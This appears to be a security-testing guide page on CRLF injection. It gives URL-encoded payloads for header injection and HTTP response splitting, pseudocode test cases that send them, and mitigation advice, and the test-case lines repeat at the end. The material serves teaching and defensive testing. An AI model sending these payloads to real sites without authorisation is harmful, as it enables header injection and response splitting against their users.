CRLF Injection

Description

CRLF (Carriage Return Line Feed) Injection occurs when an attacker can inject CRLF characters into HTTP headers, potentially leading to HTTP response splitting, header injection, or other malicious actions.

Example with Scenario

Scenario: A web application takes user input to generate HTTP headers. An attacker can manipulate the input to inject additional headers or split the HTTP response, leading to various attacks.

Payloads and Test Cases

Payloads

Header Injection:
```
%0D%0AInjected-Header: injected
```

HTTP Response Splitting:

%0D%0AContent-Length: 0%0D%0A%0D%0AHTTP/1.1 200 OK%0D%0AContent-Type: text/html%0D%0A%0D%0A<h1>Injected Content</h1>

Test Cases

Header Injection:

Payload:
```
%0D%0AInjected-Header: injected
```

Test Case:

# Send payload to the server
sendPayloadToServer("input=%0D%0AInjected-Header: injected")
# Verify if the application includes the injected header
checkForInjectedHeader("Injected-Header", "injected")

HTTP Response Splitting:

Payload:

%0D%0AContent-Length: 0%0D%0A%0D%0AHTTP/1.1 200 OK%0D%0AContent-Type: text/html%0D%0A%0D%0A<h1>Injected Content</h1>

Test Case:

# Send payload to the server
sendPayloadToServer("input=%0D%0AContent-Length: 0%0D%0A%0D%0AHTTP/1.1 200 OK%0D%0AContent-Type: text/html%0D%0A%0D%0A<h1>Injected Content</h1>")
# Verify if the application splits the HTTP response
checkForInjectedContent("<h1>Injected Content</h1>")

Mitigation

Input Validation:
- Validate and sanitize user input to ensure it does not contain CRLF characters.
- Implement strict validation rules to reject malicious input.
Use Libraries:
- Use libraries and frameworks that automatically handle header encoding and prevent injection.
- Avoid constructing HTTP headers manually using user input.
Secure Headers:
- Set secure HTTP headers to mitigate the impact of potential CRLF injection.
- Use Content Security Policy (CSP) and other security headers to protect the application.
Error Handling:
- Implement proper error handling to avoid revealing header information in error messages.
- Return generic error messages without disclosing sensitive details.

PreviousRace Conditions NextLaTeX Injection

Last updated 10 months ago

# Send payload to the server sendPayloadToServer("input=%0D%0AInjected-Header: injected") # Verify if the application includes the injected header checkForInjectedHeader("Injected-Header", "injected")

# Send payload to the server sendPayloadToServer("input=%0D%0AContent-Length: 0%0D%0A%0D%0AHTTP/1.1 200 OK%0D%0AContent-Type: text/html%0D%0A%0D%0A<h1>Injected Content</h1>") # Verify if the application splits the HTTP response checkForInjectedContent("<h1>Injected Content</h1>")